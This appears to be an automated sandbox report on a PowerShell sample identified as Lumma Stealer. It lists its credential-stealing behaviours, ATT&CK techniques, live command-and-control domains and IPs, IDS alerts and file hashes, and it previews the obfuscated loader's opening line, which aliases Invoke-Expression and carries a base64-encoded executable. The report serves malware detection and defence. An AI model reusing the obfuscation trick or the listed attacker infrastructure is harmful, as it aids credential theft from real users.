Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 3_2_00443AB0 |
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior |
Remote Access Functionality |
---|
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 231 Security Software Discovery | Remote Services | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 231 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 211 Process Injection | Security Account Manager | 231 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 41 Data from Local System | 113 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 3 Clipboard Data | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 11 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 32 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | ReversingLabs | Win32.Trojan.Generic | ||
11% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
twc.trafficmanager.net | 104.40.149.189 | true | false | high | |
toppyneedus.biz | 104.21.29.142 | true | false | high | |
s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | high | |
impolitewearr.biz | unknown | unknown | false | high | |
grapeprivatter.cyou | unknown | unknown | true | unknown | |
time.windows.com | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown | |
true |
| unknown | |
false | high | ||
true |
| unknown | |
true |
| unknown | |
true |
| unknown | |
true |
| unknown | |
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.21.29.142 | toppyneedus.biz | United States | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1600469 |
Start date and time: | 2025-01-27 15:57:09 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 45s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 11 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 176.113.115.225.ps1 |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winPS1@6/10@4/1 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis
(whitelisted): MpCmdRun.exe, d llhost.exe, WMIADAP.exe, SIHCl ient.exe, conhost.exe, svchost .exe - Excluded IPs from analysis (wh
itelisted): 20.42.73.29, 13.10 7.253.45, 40.126.31.67, 4.245. 163.56 - Excluded domains from analysis
(whitelisted): login.live.com , slscr.update.microsoft.com, otelrules.azureedge.net, otelr ules.afd.azureedge.net, blobco llector.events.data.trafficman ager.net, onedsblobprdeus15.ea stus.cloudapp.azure.com, ctldl .windowsupdate.com, azureedge- t-prod.trafficmanager.net, umw atson.events.data.microsoft.co m, fe3cr.delivery.mp.microsoft .com - Execution Graph export aborted
for target powershell.exe, PI D 7816 because it is empty - Not all processes where analyz
ed, report is missing behavior information - Report size getting too big, t
oo many NtOpenKeyEx calls foun d. - Report size getting too big, t
oo many NtQueryValueKey calls found. - Some HTTPS proxied raw data pa
ckets have been limited to 10 per session. Please view the P CAPs for the complete data.
Time | Type | Description |
---|---|---|
09:58:18 | API Interceptor | |
09:58:19 | API Interceptor | |
09:59:09 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.21.29.142 | Get hash | malicious | Amadey, AsyncRAT, KeyLogger, LummaC Stealer, PureLog Stealer, ReverseShell, Stealc | Browse | ||
Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | Amadey, LummaC Stealer, PureLog Stealer | Browse | |||
Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse | |||
Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
twc.trafficmanager.net | Get hash | malicious | Socks5Systemz | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | RHADAMANTHYS | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Strela Stealer | Browse |
| ||
s-part-0017.t-0009.fb-t-msedge.net | Get hash | malicious | TechSupportScam | Browse |
| |
Get hash | malicious | Lokibot | Browse |
| ||
Get hash | malicious | PureLog Stealer, Vidar | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | CobaltStrike | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
toppyneedus.biz | Get hash | malicious | LummaC Stealer | Browse |
| |
Get hash | malicious | Amadey, LummaC Stealer, Stealc | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | DarkTortilla, FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Remcos | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
a0e9f5d64349fb13191bc781f81f42e1 | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | SmokeLoader | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | Amadey, LummaC Stealer, Stealc | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar | Browse |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.531881926582401 |
Encrypted: | false |
SSDEEP: | 96:yAF4jj5rxYidNRH3Uje0e35/3oo7p1QXIGZAX/d5FMT2SlPkpXmTAcf/VXT5NHBx:3slmGNR30mYAzuiFqZ24lO8 |
MD5: | 254F9C40983BBF66DD4D599441E34E87 |
SHA1: | EFD13C2E406DC83D1172E64EFE01A732C7183D10 |
SHA-256: | 41AEA0CA1960C23C0F124BA4665E9C70A02C1F1A9CF8AF130920413D2931DD10 |
SHA-512: | E52D9AEAA4BD094E8A3D712D18EE802ABCBC07D2CA3B50A6077F9DDE4EB66270162E63D0F07BE7761C99BAAC2F5287AAD92CB35C3C78D3208404F1CB19D7F05F |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7284 |
Entropy (8bit): | 3.735348400968557 |
Encrypted: | false |
SSDEEP: | 96:RSIU6o7wVetb4jQEXq6YkY7aULDEgmfHNpXErZn55aMWpm:R6l7wVeJ4jrq6YNa+DEgmftEZpWpm |
MD5: | 46D4987B77988FD35469EAF38B1683C2 |
SHA1: | 62817AF8ED50F7CC9CC27A349011C0CB97D0C61F |
SHA-256: | 44A67B725D52B31E236227589FE66B76EB6335F0D01ABCF78851FF4F346D4353 |
SHA-512: | 6497CF8A4B7BF3DD06C72C9FFDFE80478A33507F8DA650A1159058F377D066F5DE437A8E8DB7221E9EC7083DBDB798E1A7B59AAFA03A0C14668B50F938073F45 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4905 |
Entropy (8bit): | 4.691974150507306 |
Encrypted: | false |
SSDEEP: | 96:uIjfKI7GP7VNJFKloFMMFl9wWTzFMMF0ufsd:uIeYGP7Z4cfcufS |
MD5: | 781FB32B23CED1AD8BC4BF07F91E6B8E |
SHA1: | C3688E35C5DA6BB1F07FE6744C56000CFD52A09C |
SHA-256: | 60FE7022A6DF9A06CC5C405AC1CAE25555DF3DB7635A30953C2836406FEA92E2 |
SHA-512: | 188E8C5FF577259975BE42CB3996A68B58876E2AD976BFA367F81D6EAF4CEAB578668A2A0324209FEFAA1BF19B66A3CDA726F1F999C1FE7F826EC1E924A1884F |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11608 |
Entropy (8bit): | 4.890472898059848 |
Encrypted: | false |
SSDEEP: | 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP |
MD5: | 8A4B02D8A977CB929C05D4BC2942C5A9 |
SHA1: | F9A6426CAF2E8C64202E86B07F1A461056626BEA |
SHA-256: | 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715 |
SHA-512: | 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1628158735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul5mxllp:NllU4x/ |
MD5: | 3A925CB766CE4286E251C26E90B55CE8 |
SHA1: | 3FA8EE6E901101A4661723B94D6C9309E281BD28 |
SHA-256: | 4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8 |
SHA-512: | F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6225 |
Entropy (8bit): | 3.736108937771384 |
Encrypted: | false |
SSDEEP: | 96:Vw6knSlICErtkvhkvCCtplMrYhLHwlMrYhAHo:Vw6kaElrMvM8 |
MD5: | 0F1D7D03A39B7AB28C7E2C75F3CF8332 |
SHA1: | 70761CBE65B6EFC0347E759757688C3C84CB0C3F |
SHA-256: | 719E6E5D609FE1216E2F5277CA00B7D573F26EF6B14EE01DF400C3661AA6E61A |
SHA-512: | BC59A8FD74D86C60863964CF60D167D1FBB1AA52700E2DCAC06AB3D3CE471FE5567BA4307E2D1D1AF10B2B58979DEEF75C044789EED62762E033D7060A1BCDD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6225 |
Entropy (8bit): | 3.736108937771384 |
Encrypted: | false |
SSDEEP: | 96:Vw6knSlICErtkvhkvCCtplMrYhLHwlMrYhAHo:Vw6kaElrMvM8 |
MD5: | 0F1D7D03A39B7AB28C7E2C75F3CF8332 |
SHA1: | 70761CBE65B6EFC0347E759757688C3C84CB0C3F |
SHA-256: | 719E6E5D609FE1216E2F5277CA00B7D573F26EF6B14EE01DF400C3661AA6E61A |
SHA-512: | BC59A8FD74D86C60863964CF60D167D1FBB1AA52700E2DCAC06AB3D3CE471FE5567BA4307E2D1D1AF10B2B58979DEEF75C044789EED62762E033D7060A1BCDD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1835008 |
Entropy (8bit): | 4.417449902710954 |
Encrypted: | false |
SSDEEP: | 6144:Mcifpi6ceLPL9skLmb0mNSWSPtaJG8nAgex285i2MMhA20X4WABlGuN/5+:hi58NSWIZBk2MM6AFB1o |
MD5: | B758660C24748E73B8A4D2EDCE9851CB |
SHA1: | 951DF3CE7AC9E6998523954A92130A4F6864C078 |
SHA-256: | D93D4925F9BAA62DB826125A4D95561817741B1457EBDDA2AD20B88464F9AF2C |
SHA-512: | C3BA27F08D88CD16504B064A04F9F4B1FEB2DB8A3832AF95B4D1D127B235D81CBD05E74FFF03C5F60B25F652A6CCAD6C97BAD8C72837375A60693C4F28900FB7 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.485284056284138 |
TrID: | |
File name: | 176.113.115.225.ps1 |
File size: | 546'028 bytes |
MD5: | eaf7ebe973ee32e26027ba74eb211b0c |
SHA1: | 29f2261e2a37e97045d000cc1bd0fb614cff9f74 |
SHA256: | 97a191d90077f093ce6e0d472167b36bb648de846098ed494d981c1076d358f5 |
SHA512: | c35bd999fb35a1a28816622cdf743e5d2287b1a5933229d682ac0da1c96a91fc81dcdcd2daeac1e9dff79fc74f1c3af79e044037ff0318d13380addc7067b966 |
SSDEEP: | 12288:ZcTOT1uStOOovc4mkab9NY+2GyKKIoKUOwFL9:ZcTPStkvcVZT2GyQoKUOwFL9 |
TLSH: | E3C48D3141437D5E3F9A2ECA6400ADC10C8D3D97B614D584AE8A4276B2BE23B5F6D9FC |
File Content Preview: | .... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$OE="ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAFOelGcAAAAAAAAAAOAALiELATAAACABAAAkAQAAAAAAEj8BAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQA |
Icon Hash: | 3270d6baae77db44 |
Download Network PCAP: filtered – full
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-27T15:58:20.506711+0100 | 2059421 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) | 1 | 192.168.2.7 | 61999 | 1.1.1.1 | 53 | UDP |
2025-01-27T15:58:20.519335+0100 | 2059423 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) | 1 | 192.168.2.7 | 61168 | 1.1.1.1 | 53 | UDP |
2025-01-27T15:58:21.067993+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:21.067993+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:21.593553+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:21.593553+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.192148+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.192148+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.688671+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.688671+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:23.347094+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:23.347094+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP |
